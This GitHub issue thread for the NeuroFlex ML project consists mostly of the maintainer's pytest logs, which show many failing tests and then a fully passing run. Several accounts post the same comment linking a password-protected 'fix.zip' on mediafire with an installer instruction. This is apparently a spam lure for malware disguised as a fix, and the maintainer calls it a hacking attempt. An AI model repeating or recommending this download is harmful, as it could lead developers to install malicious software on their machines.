### ISSUE TITLE
fixes of neuroflex

### ISSUE THREAD

**Issue by kasinadhsarma** [VishwamAI/NeuroFlex#37]
============================= test session starts ==============================
platform linux -- Python 3.12.5, pytest-8.3.2, pluggy-1.5.0
rootdir: /home/ubuntu/NeuroFlex
configfile: pytest.ini
collected 110 items

tests/test_advanced_math_solving.py sssssss                              [  6%]
tests/test_advanced_nn.py ......FFF.FFFFFFFFF...FFFFF.F                  [ 32%]
tests/test_advanced_time_series_analysis.py ...F.F.                      [ 39%]
tests/test_correctgrammer.py FFF...                                      [ 44%]
tests/test_jax_module.py F..F                                            [ 48%]
tests/test_model.py .FF..                                                [ 52%]
tests/test_neural_network.py FFFF.F...                                   [ 60%]
tests/test_neuromorphic_computing.py FF.F                                [ 64%]
tests/test_pytorch_integration.py ....                                   [ 68%]
tests/test_rl_module.py ....F                                            [ 72%]
tests/test_self_curing_algorithm.py FFFFFF                               [ 78%]
tests/test_synthetic_biology_insights.py .FF...                          [ 83%]
tests/test_tokenisation.py .....                                         [ 88%]
tests/test_tokenizer.py .............                                    [100%]

=================================== FAILURES ===================================

**Comment by Wanderx13** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by kasinadhsarma** [comment]
=========================== short test summary info ============================
FAILED tests/test_advanced_nn.py::TestXLAOptimizations::test_jit_compilation
FAILED tests/test_advanced_nn.py::TestConvolutionLayers::test_2d_convolution
FAILED tests/test_advanced_nn.py::TestConvolutionLayers::test_3d_convolution
FAILED tests/test_advanced_nn.py::TestConvolutionLayers::test_error_handling
FAILED tests/test_advanced_nn.py::TestConvolutionLayers::test_gradients - Ass...
FAILED tests/test_advanced_nn.py::TestConvolutionLayers::test_input_dimension_mismatch
FAILED tests/test_advanced_nn.py::TestConvolutionLayers::test_mixed_cnn_dnn
FAILED tests/test_advanced_nn.py::TestConvolutionLayers::test_model_consistency
FAILED tests/test_advanced_nn.py::TestReinforcementLearning::test_action_selection
FAILED tests/test_advanced_nn.py::TestReinforcementLearning::test_create_train_state
FAILED tests/test_advanced_nn.py::TestReinforcementLearning::test_learning_rate_scheduler
FAILED tests/test_advanced_nn.py::TestReinforcementLearning::test_model_apply
FAILED tests/test_advanced_nn.py::TestReinforcementLearning::test_rl_agent_output
FAILED tests/test_advanced_nn.py::TestReinforcementLearning::test_rl_agent_training
FAILED tests/test_advanced_nn.py::TestReinforcementLearning::test_rl_model_initialization
FAILED tests/test_advanced_nn.py::TestConsciousnessSimulation::test_consciousness_simulation
FAILED tests/test_advanced_nn.py::TestDNNBlock::test_dnn_block - AssertionErr...
FAILED tests/test_advanced_nn.py::TestAdversarialTraining::test_adversarial_training
FAILED tests/test_advanced_time_series_analysis.py::test_prophet_forecast - T...
FAILED tests/test_advanced_time_series_analysis.py::test_causal_inference - A...
FAILED tests/test_correctgrammer.py::TestCorrectGrammar::test_basic_correction
FAILED tests/test_correctgrammer.py::TestCorrectGrammar::test_capitalization_correction
FAILED tests/test_correctgrammer.py::TestCorrectGrammar::test_empty_string - ...
FAILED tests/test_jax_module.py::TestJAXModule::test_batch_predict - Assertio...
FAILED tests/test_jax_module.py::TestJAXModule::test_train_jax_model - Assert...
FAILED tests/test_model.py::TestNeuroFlexTextProcessing::test_process_text_empty
FAILED tests/test_model.py::TestNeuroFlexTextProcessing::test_process_text_special_characters
FAILED tests/test_neural_network.py::test_machinelearning_forward_pass - Type...
FAILED tests/test_neural_network.py::test_neuroflexclassifier_fit_predict - T...
FAILED tests/test_neural_network.py::test_edge_cases - TypeError: MachineLear...
FAILED tests/test_neural_network.py::test_initialization_and_convergence - Ty...
FAILED tests/test_neural_network.py::test_scop_data_fallback - AssertionError...
FAILED tests/test_neuromorphic_computing.py::TestNeuromorphicComputing::test_neuromorphic_computing
FAILED tests/test_neuromorphic_computing.py::TestNeuromorphicComputing::test_spiking_neural_network
FAILED tests/test_neuromorphic_computing.py::TestNeuromorphicComputing::test_train_step
FAILED tests/test_rl_module.py::TestRLModule::test_train_rl_agent - Assertion...
FAILED tests/test_self_curing_algorithm.py::TestSelfCuringAlgorithm::test_diagnose_data_quality
FAILED tests/test_self_curing_algorithm.py::TestSelfCuringAlgorithm::test_diagnose_low_performance
FAILED tests/test_self_curing_algorithm.py::TestSelfCuringAlgorithm::test_diagnose_untrained_model
FAILED tests/test_self_curing_algorithm.py::TestSelfCuringAlgorithm::test_heal_data_quality
FAILED tests/test_self_curing_algorithm.py::TestSelfCuringAlgorithm::test_heal_low_performance
FAILED tests/test_self_curing_algorithm.py::TestSelfCuringAlgorithm::test_heal_untrained_model
FAILED tests/test_synthetic_biology_insights.py::test_design_protein - ValueE...
FAILED tests/test_synthetic_biology_insights.py::test_optimize_protein - Valu...
====== 44 failed, 59 passed, 7 skipped, 31 warnings in 144.27s (0:02:24) =======
RUNNING THE L-BFGS-B CODE

**Comment by swaggy111** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Wanderx13** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by kasinadhsarma** [comment]
![image](https://github.com/user-attachments/assets/523de815-2148-43ec-9851-e37f009c3f04)
you cant hack me of dos attack

**Comment by kasinadhsarma** [comment]
platform linux -- Python 3.12.5, pytest-8.3.2, pluggy-1.5.0 -- /home/ubuntu/.pyenv/versions/3.12.5/bin/python3.12
cachedir: .pytest_cache
rootdir: /home/ubuntu/NeuroFlex
configfile: pytest.ini
collecting ... collected 110 items

tests/test_advanced_math_solving.py::TestAdvancedMathSolving::test_consciousness_simulation FAILED [  0%]
tests/test_advanced_math_solving.py::TestAdvancedMathSolving::test_error_handling FAILED [  1%]
tests/test_advanced_math_solving.py::TestAdvancedMathSolving::test_evaluate_solution FAILED [  2%]
tests/test_advanced_math_solving.py::TestAdvancedMathSolving::test_generate_problem FAILED [  3%]
tests/test_advanced_math_solving.py::TestAdvancedMathSolving::test_generate_step_by_step_solution FAILED [  4%]
tests/test_advanced_math_solving.py::TestAdvancedMathSolving::test_initialization FAILED [  5%]
tests/test_advanced_math_solving.py::TestAdvancedMathSolving::test_solve_problem FAILED [  6%]
tests/test_advanced_nn.py::TestDataAugmentation::test_brightness_adjustment PASSED [  7%]
tests/test_advanced_nn.py::TestDataAugmentation::test_contrast_adjustment PASSED [  8%]
tests/test_advanced_nn.py::TestDataAugmentation::test_deterministic_with_same_key PASSED [  9%]
tests/test_advanced_nn.py::TestDataAugmentation::test_key_update PASSED  [ 10%]
tests/test_advanced_nn.py::TestDataAugmentation::test_rotation PASSED    [ 10%]
tests/test_advanced_nn.py::TestDataAugmentation::test_rotation_range PASSED [ 11%]
tests/test_advanced_nn.py::TestXLAOptimizations::test_jit_compilation FAILED [ 12%]
tests/test_advanced_nn.py::TestConvolutionLayers::test_2d_convolution FAILED [ 13%]
tests/test_advanced_nn.py::TestConvolutionLayers::test_3d_convolution FAILED [ 14%]
tests/test_advanced_nn.py::TestConvolutionLayers::test_cnn_block_accessibility PASSED [ 15%]
tests/test_advanced_nn.py::TestConvolutionLayers::test_error_handling FAILED [ 16%]
tests/test_advanced_nn.py::TestConvolutionLayers::test_gradients FAILED  [ 17%]
tests/test_advanced_nn.py::TestConvolutionLayers::test_input_dimension_mismatch FAILED [ 18%]
tests/test_advanced_nn.py::TestConvolutionLayers::test_mixed_cnn_dnn FAILED [ 19%]
tests/test_advanced_nn.py::TestConvolutionLayers::test_model_consistency FAILED [ 20%]
tests/test_advanced_nn.py::TestReinforcementLearning::test_action_selection FAILED [ 20%]
tests/test_advanced_nn.py::TestReinforcementLearning::test_create_train_state FAILED [ 21%]
tests/test_advanced_nn.py::TestReinforcementLearning::test_learning_rate_scheduler FAILED [ 22%]
tests/test_advanced_nn.py::TestReinforcementLearning::test_model_apply FAILED [ 23%]
tests/test_advanced_nn.py::TestReinforcementLearning::test_model_output PASSED [ 24%]
tests/test_advanced_nn.py::TestReinforcementLearning::test_model_params PASSED [ 25%]
tests/test_advanced_nn.py::TestReinforcementLearning::test_model_structure PASSED [ 26%]
tests/test_advanced_nn.py::TestReinforcementLearning::test_rl_agent_output FAILED [ 27%]
tests/test_advanced_nn.py::TestReinforcementLearning::test_rl_agent_training FAILED [ 28%]
tests/test_advanced_nn.py::TestReinforcementLearning::test_rl_model_initialization FAILED [ 29%]
tests/test_advanced_nn.py::TestConsciousnessSimulation::test_consciousness_simulation FAILED [ 30%]
tests/test_advanced_nn.py::TestDNNBlock::test_dnn_block FAILED           [ 30%]
tests/test_advanced_nn.py::TestSHAPInterpretability::test_shap_interpretability PASSED [ 31%]
tests/test_advanced_nn.py::TestAdversarialTraining::test_adversarial_training FAILED [ 32%]
tests/test_advanced_time_series_analysis.py::test_create_advanced_time_series_analysis PASSED [ 33%]
tests/test_advanced_time_series_analysis.py::test_arima_forecast PASSED  [ 34%]
tests/test_advanced_time_series_analysis.py::test_sarima_forecast PASSED [ 35%]
tests/test_advanced_time_series_analysis.py::test_prophet_forecast FAILED [ 36%]
tests/test_advanced_time_series_analysis.py::test_detect_anomalies PASSED [ 37%]
tests/test_advanced_time_series_analysis.py::test_causal_inference PASSED [ 38%]
tests/test_advanced_time_series_analysis.py::test_invalid_forecast_model PASSED [ 39%]
tests/test_correctgrammer.py::TestCorrectGrammar::test_basic_correction FAILED [ 40%]
tests/test_correctgrammer.py::TestCorrectGrammar::test_capitalization_correction FAILED [ 40%]
tests/test_correctgrammer.py::TestCorrectGrammar::test_empty_string FAILED [ 41%]
tests/test_correctgrammer.py::TestCorrectGrammar::test_no_correction_needed PASSED [ 42%]
tests/test_correctgrammer.py::TestCorrectGrammar::test_punctuation_correction PASSED [ 43%]
tests/test_correctgrammer.py::TestCorrectGrammar::test_special_characters PASSED [ 44%]
tests/test_jax_module.py::TestJAXModule::test_batch_predict FAILED       [ 45%]
tests/test_jax_module.py::TestJAXModule::test_jax_model_initialization PASSED [ 46%]
tests/test_jax_module.py::TestJAXModule::test_jax_vmap PASSED            [ 47%]
tests/test_jax_module.py::TestJAXModule::test_train_jax_model FAILED     [ 48%]
tests/test_model.py::TestNeuroFlexTextProcessing::test_process_text_basic PASSED [ 49%]
tests/test_model.py::TestNeuroFlexTextProcessing::test_process_text_empty FAILED [ 50%]
tests/test_model.py::TestNeuroFlexTextProcessing::test_process_text_special_characters FAILED [ 50%]
tests/test_model.py::TestNeuroFlexTextProcessing::test_process_text_with_grammar_errors PASSED [ 51%]
tests/test_model.py::TestNeuroFlexTextProcessing::test_read_sequence_file PASSED [ 52%]
tests/test_neural_network.py::test_machinelearning_forward_pass FAILED   [ 53%]
tests/test_neural_network.py::test_neuroflexclassifier_fit_predict FAILED [ 54%]
tests/test_neural_network.py::test_edge_cases FAILED                     [ 55%]
tests/test_neural_network.py::test_initialization_and_convergence FAILED [ 56%]
tests/test_neural_network.py::test_alphafold_integration_initialization PASSED [ 57%]
tests/test_neural_network.py::test_scop_data_fallback FAILED             [ 58%]
tests/test_neural_network.py::test_alphafold_integration_setup_model PASSED [ 59%]
tests/test_neural_network.py::test_alphafold_integration_prepare_features PASSED [ 60%]
tests/test_neural_network.py::test_alphafold_integration_predict_structure PASSED [ 60%]
tests/test_neuromorphic_computing.py::TestNeuromorphicComputing::test_neuromorphic_computing FAILED [ 61%]
tests/test_neuromorphic_computing.py::TestNeuromorphicComputing::test_spiking_neural_network FAILED [ 62%]
tests/test_neuromorphic_computing.py::TestNeuromorphicComputing::test_spiking_neuron PASSED [ 63%]
tests/test_neuromorphic_computing.py::TestNeuromorphicComputing::test_train_step FAILED [ 64%]
tests/test_pytorch_integration.py::TestPyTorchIntegration::test_array_conversion PASSED [ 65%]
tests/test_pytorch_integration.py::TestPyTorchIntegration::test_model_forward_pass PASSED [ 66%]
tests/test_pytorch_integration.py::TestPyTorchIntegration::test_pytorch_model_structure PASSED [ 67%]
tests/test_pytorch_integration.py::TestPyTorchIntegration::test_train_pytorch_model PASSED [ 68%]
tests/test_rl_module.py::TestRLModule::test_create_train_state PASSED    [ 69%]
tests/test_rl_module.py::TestRLModule::test_rl_agent_initialization PASSED [ 70%]
tests/test_rl_module.py::TestRLModule::test_rl_environment PASSED        [ 70%]
tests/test_rl_module.py::TestRLModule::test_select_action PASSED         [ 71%]
tests/test_rl_module.py::TestRLModule::test_train_rl_agent FAILED        [ 72%]
tests/test_self_curing_algorithm.py::TestSelfCuringAlgorithm::test_diagnose_data_quality FAILED [ 73%]
tests/test_self_curing_algorithm.py::TestSelfCuringAlgorithm::test_diagnose_low_performance FAILED [ 74%]
tests/test_self_curing_algorithm.py::TestSelfCuringAlgorithm::test_diagnose_untrained_model FAILED [ 75%]
tests/test_self_curing_algorithm.py::TestSelfCuringAlgorithm::test_heal_data_quality FAILED [ 76%]
tests/test_self_curing_algorithm.py::TestSelfCuringAlgorithm::test_heal_low_performance FAILED [ 77%]
tests/test_self_curing_algorithm.py::TestSelfCuringAlgorithm::test_heal_untrained_model FAILED [ 78%]
tests/test_synthetic_biology_insights.py::test_create_synthetic_biology_insights PASSED [ 79%]
tests/test_synthetic_biology_insights.py::test_design_protein FAILED     [ 80%]
tests/test_synthetic_biology_insights.py::test_optimize_protein FAILED   [ 80%]
tests/test_synthetic_biology_insights.py::test_predict_gene_expression PASSED [ 81%]
tests/test_synthetic_biology_insights.py::test_design_genetic_circuit PASSED [ 82%]
tests/test_synthetic_biology_insights.py::test_analyze_metabolic_pathway PASSED [ 83%]
tests/test_tokenisation.py::TestTokenisation::test_basic_tokenization PASSED [ 84%]
tests/test_tokenisation.py::TestTokenisation::test_contractions PASSED   [ 85%]
tests/test_tokenisation.py::TestTokenisation::test_empty_string PASSED   [ 86%]
tests/test_tokenisation.py::TestTokenisation::test_numbers PASSED        [ 87%]
tests/test_tokenisation.py::TestTokenisation::test_special_characters PASSED [ 88%]
tests/test_tokenizer.py::TestTokenizer::test_decode_basic PASSED         [ 89%]
tests/test_tokenizer.py::TestTokenizer::test_decode_error_handling PASSED [ 90%]
tests/test_tokenizer.py::TestTokenizer::test_decode_invalid_input PASSED [ 90%]
tests/test_tokenizer.py::TestTokenizer::test_empty_string PASSED         [ 91%]
tests/test_tokenizer.py::TestTokenizer::test_encode_basic PASSED         [ 92%]
tests/test_tokenizer.py::TestTokenizer::test_encode_decode_roundtrip PASSED [ 93%]
tests/test_tokenizer.py::TestTokenizer::test_encode_invalid_input PASSED [ 94%]
tests/test_tokenizer.py::TestTokenizer::test_encode_no_bos PASSED        [ 95%]
tests/test_tokenizer.py::TestTokenizer::test_encode_no_eos PASSED        [ 96%]
tests/test_tokenizer.py::TestTokenizer::test_logging_on_error PASSED     [ 97%]
tests/test_tokenizer.py::TestTokenizer::test_special_tokens PASSED       [ 98%]
tests/test_tokenizer.py::TestTokenizer::test_special_tokens_handling PASSED [ 99%]
tests/test_tokenizer.py::TestTokenizer::test_tokenize_detokenize PASSED  [100%]

=================================== FAILURES ===================================

**Comment by seeronline** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by kasinadhsarma** [comment]
============ 54 failed, 64 passed, 31 warnings in 261.23s (0:04:21) ============

**Comment by kasinadhsarma** [comment]
=========================== short test summary info ============================
FAILED tests/test_consciousness_simulation.py::TestConsciousnessSimulation::test_1d_input_handling
FAILED tests/test_consciousness_simulation.py::TestConsciousnessSimulation::test_attention_head_adjustment
FAILED tests/test_consciousness_simulation.py::TestConsciousnessSimulation::test_consciousness_simulation
FAILED tests/test_consciousness_simulation.py::TestConsciousnessSimulation::test_dynamic_attention
FAILED tests/test_consciousness_simulation.py::TestConsciousnessSimulation::test_forward_pass
FAILED tests/test_consciousness_simulation.py::TestConsciousnessSimulation::test_generate_thought
FAILED tests/test_consciousness_simulation.py::TestConsciousnessSimulation::test_gru_input_projection
=================== 7 failed, 3 passed, 1 warning in 22.24s ====================

**Comment by kasinadhsarma** [comment]
============================= test session starts ==============================
platform linux -- Python 3.12.5, pytest-8.3.2, pluggy-1.5.0
rootdir: /home/ubuntu/NeuroFlex
configfile: pytest.ini
plugins: hydra-core-1.3.2
collected 103 items                                                            

tests/test_advanced_math_solving.py FFFFFF                               [  5%]
tests/test_advanced_nn.py ......FFFF.FFFFFFFFFF.FFFFFFFF                 [ 34%]
tests/test_advanced_time_series_analysis.py .......                      [ 41%]
tests/test_jax_module.py F..F                                            [ 45%]
tests/test_model.py FFFF                                                 [ 49%]
tests/test_neuromorphic_computing.py FF.F                                [ 53%]
tests/test_pytorch_integration.py ....                                   [ 57%]
tests/test_rl_module.py ....F                                            [ 62%]
tests/test_self_curing_algorithm.py .....                                [ 66%]
tests/test_synthetic_biology_insights.py ......                          [ 72%]
tests/test_tokenisation.py .....                                         [ 77%]
tests/test_tokenizer.py ................                                 [ 93%]
tests/test_tokenizer_edge_cases.py .....                                 [ 98%]
tests/test_tokenizer_performance.py ..                                   [100%]
============= 38 failed, 65 passed, 3 warnings in 80.51s (0:01:20) =============

**Comment by kasinadhsarma** [comment]
============================= test session starts ==============================
platform linux -- Python 3.12.5, pytest-8.3.2, pluggy-1.5.0
rootdir: /home/ubuntu/NeuroFlex
configfile: pytest.ini
plugins: hydra-core-1.3.2
collected 103 items

tests/test_advanced_math_solving.py FFFFFF                               [  5%]
tests/test_advanced_nn.py ......FFFF.FFFFFFFFFF.FFFFFFFF                 [ 34%]
tests/test_advanced_time_series_analysis.py .......                      [ 41%]
tests/test_jax_module.py ....                                            [ 45%]
tests/test_model.py ...F                                                 [ 49%]
tests/test_neuromorphic_computing.py FF.F                                [ 53%]
tests/test_pytorch_integration.py ....                                   [ 57%]
tests/test_rl_module.py ....F                                            [ 62%]
tests/test_self_curing_algorithm.py .....                                [ 66%]
tests/test_synthetic_biology_insights.py ......                          [ 72%]
tests/test_tokenisation.py .....                                         [ 77%]
tests/test_tokenizer.py ................                                 [ 93%]
tests/test_tokenizer_edge_cases.py .....                                 [ 98%]
tests/test_tokenizer_performance.py ..                                   [100%]                                                                                                        ============= 33 failed, 70 passed, 1 warning in 74.37s (0:01:14) ==============

**Comment by kasinadhsarma** [comment]
============================= test session starts ==============================
platform linux -- Python 3.12.5, pytest-8.3.2, pluggy-1.5.0
rootdir: /home/ubuntu/NeuroFlex
configfile: pytest.ini
collected 140 items                                                            

tests/test_advanced_math_solving.py FFFFFF                               [  4%]
tests/test_advanced_nn.py FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF.......F [ 37%]
FF                                                                       [ 38%]
tests/test_advanced_time_series_analysis.py .......                      [ 43%]
tests/test_jax_module.py ....                                            [ 46%]
tests/test_model.py ...F                                                 [ 49%]
tests/test_neuroflex_nn.py .FFFFFFFF                                     [ 55%]
tests/test_neuromorphic_computing.py .FF.F                               [ 59%]
tests/test_pytorch_integration.py ....                                   [ 62%]
tests/test_rl_module.py ...sFF                                           [ 66%]
tests/test_self_curing_algorithm.py .....                                [ 70%]
tests/test_synthetic_biology_insights.py ......                          [ 74%]
tests/test_tensorflow_convolutions.py ........                           [ 80%]
tests/test_tokenisation.py .....                                         [ 83%]
tests/test_tokenizer.py ................                                 [ 95%]
tests/test_tokenizer_edge_cases.py .....                                 [ 98%]
tests/test_tokenizer_performance.py ..                                   [100%]
============= 61 failed, 78 passed, 1 skipped in 62.35s (0:01:02) ==============

**Comment by kasinadhsarma** [comment]
============================= test session starts ==============================
platform linux -- Python 3.12.5, pytest-8.3.2, pluggy-1.5.0
rootdir: /home/ubuntu/NeuroFlex
configfile: pytest.ini
collected 159 items

tests/test_advanced_math_solving.py FFFFFF                               [  3%]
tests/test_advanced_nn.py FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF.......F [ 32%]
FF                                                                       [ 33%]
tests/test_advanced_time_series_analysis.py .......                      [ 38%]
tests/test_cnn.py ....                                                   [ 40%]
tests/test_gan.py .....                                                  [ 44%]
tests/test_jax_module.py ....                                            [ 46%]
tests/test_lstm.py ...                                                   [ 48%]
tests/test_model.py ...F                                                 [ 50%]
tests/test_neuroflex_nn.py .FFFFFFFF                                     [ 56%]
tests/test_neuromorphic_computing.py .FF.F                               [ 59%]
tests/test_pytorch_integration.py ....                                   [ 62%]
tests/test_rl_module.py ...sFF                                           [ 66%]
tests/test_rnn.py ....                                                   [ 68%]
tests/test_self_curing_algorithm.py .....                                [ 71%]
tests/test_synthetic_biology_insights.py ......                          [ 75%]
tests/test_tensorflow_convolutions.py ........                           [ 80%]
tests/test_tokenisation.py .....                                         [ 83%]
tests/test_tokenizer.py ................                                 [ 93%]
tests/test_tokenizer_edge_cases.py .....                                 [ 96%]
tests/test_tokenizer_performance.py ..                                   [ 98%]
tests/test_vae.py ...                                                    [100%]
============= 33 failed, 71 passed, 3 warnings in 95.45s (0:01:35) ============= we are just expanding more and more we need solution at on point

**Comment by kasinadhsarma** [comment]
(new_venv) ubuntu@ip-10-240-193-138:~/NeuroFlex$ source new_venv/bin/activate && export PYTHONPATH=$(pwd) && pytest tests/
============================= test session starts ==============================
platform linux -- Python 3.12.5, pytest-8.3.2, pluggy-1.5.0
rootdir: /home/ubuntu/NeuroFlex
configfile: pytest.ini
collected 82 items                                                             

tests/advanced_models/test_advanced_math_solving.py .ss............      [ 18%]
tests/advanced_models/test_multi_modal_learning.py ........s.            [ 30%]
tests/advanced_models/test_neural_networks.py ......                     [ 37%]
tests/advanced_models/test_reinforcement_learning.py ......              [ 45%]
tests/advanced_models/test_reinforcement_learning_advancements.py ...... [ 52%]
...s                                                                     [ 57%]
tests/cognitive_architectures/test_advanced_thinking.py ........         [ 67%]
tests/cognitive_architectures/test_cognitive_architectures.py .s..s..s   [ 76%]
tests/edge_ai/test_edge_ai_optimization.py ......ss...                   [ 90%]
tests/edge_ai/test_neuromorphic_computing.py ....s...                    [100%]

=============================== warnings summary ===============================
tests/edge_ai/test_edge_ai_optimization.py::TestEdgeAIOptimization::test_model_compression
tests/edge_ai/test_edge_ai_optimization.py::test_optimize
  /home/ubuntu/NeuroFlex/new_venv/lib/python3.12/site-packages/torch/ao/quantization/observer.py:221: UserWarning: Please use quant_min and quant_max to specify the range for observers.                     reduce_range will be deprecated in a future release of PyTorch.
    warnings.warn(

-- Docs: https://docs.pytest.org/en/stable/how-to/capture-warnings.html
================= 72 passed, 10 skipped, 2 warnings in 25.92s ==================
